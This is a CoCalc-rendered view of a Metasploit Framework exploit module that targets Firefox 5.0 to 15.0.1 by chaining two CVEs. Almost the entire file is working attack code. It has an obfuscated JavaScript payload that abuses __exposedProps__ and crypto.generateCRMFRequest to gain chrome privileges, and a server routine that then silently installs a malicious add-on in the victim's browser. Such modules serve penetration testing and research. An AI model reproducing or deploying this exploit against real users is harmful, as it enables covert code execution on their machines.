CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10
  include Msf::Exploit::Remote::BrowserAutopwn

11
  include Msf::Exploit::Remote::FirefoxAddonGenerator

12


13
  autopwn_info({

14
    :ua_name    => HttpClients::FF,

15
    :ua_minver  => "5.0",

16
    :ua_maxver  => "15.0.1",

17
    :javascript => true,

18
    :rank       => NormalRanking

19
  })

20


21
  def initialize(info = {})

22
    super(update_info(info,

23
      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',

24
      'Description'    => %q{

25
        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given

26
        invalid input, would throw an exception that did not have an __exposedProps__

27
        property set. By re-setting this property on the exception object's prototype,

28
        the chrome-based defineProperty method is made available.

29


30
        With the defineProperty method, functions belonging to window and document can be

31
        overridden with a function that gets called from chrome-privileged context. From here,

32
        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"

33
        into the context's private scope. Since the window does not have a chrome:// URL,

34
        the insecure parts of Components.classes are not available, so instead the AddonManager

35
        API is invoked to silently install a malicious plugin.

36
      },

37
      'License' => MSF_LICENSE,

38
      'Author'  => [

39
        'Mariusz Mlynski', # discovered CVE-2012-3993

40
        'moz_bug_r_a4', # discovered CVE-2013-1710

41
        'joev' # metasploit module

42
      ],

43
      'DisclosureDate' => '2013-08-06',

44
      'References' => [

45
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)

46
        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],

47
        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)

48
      ],

49
      'BrowserRequirements' => {

50
        :source  => 'script',

51
        :ua_name => HttpClients::FF,

52
        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }

53
      }

54
    ))

55


56
    register_options([

57
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )

58
    ])

59
  end

60


61
  def on_request_exploit(cli, request, target_info)

62
    if request.uri.match(/\.xpi$/i)

63
      print_status("Sending the malicious addon")

64
      send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })

65
    else

66
      print_status("Sending HTML")

67
      res = generate_html(target_info,request.headers['Host'])

68
      vprint_status res.to_s

69
      send_response_html(cli, res)

70
    end

71
  end

72


73
  def generate_html(target_info,refer)

74
    injection = if target_info[:ua_ver].to_i == 15

75
      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"

76
    else

77
      "p2.constructor.defineProperty(obj,key,{get:runme});"

78
    end

79


80
    if refer.nil? or refer.blank?

81
      redirect = "#{get_module_uri}/addon.xpi"

82
    else

83
      proto = ((datastore['SSL']) ? 'https' : 'http')

84
      redirect = "#{proto}://#{refer}#{get_module_resource}addon.xpi"

85
    end

86


87
    script = js_obfuscate %Q|

88
      try{InstallTrigger.install(0)}catch(e){p=e;};

89
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));

90
      p2.__exposedProps__={

91
        constructor:'rw',

92
        prototype:'rw',

93
        defineProperty:'rw',

94
        __exposedProps__:'rw'

95
      };

96
      var s = document.querySelector('#payload').innerHTML;

97
      var q = false;

98
      var register = function(obj,key) {

99
        var runme = function(){

100
          if (q) return;

101
          q = true;

102
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");

103
        };

104
        try {

105
          #{injection}

106
        } catch (e) {}

107
      };

108
      for (var i in window) register(window, i);

109
      for (var i in document) register(document, i);

110
    |

111


112
    js_payload = js_obfuscate %Q|

113
      if (!window.done) {

114
        window.AddonManager.getInstallForURL(

115
          '#{redirect}',

116
          function(install) { install.install() },

117
          'application/x-xpinstall'

118
        );

119
        window.done = true;

120
      }

121
    |

122


123
    %Q|

124
      <html>

125
      <body>

126
      #{datastore['CONTENT']}

127
      <div id='payload' style='display:none'>

128
        #{js_payload}

129
      </div>

130
      <script>

131
        #{script}

132
      </script>

133
      </body>

134
      </html>

135
    |

136
  end

137
end

138


139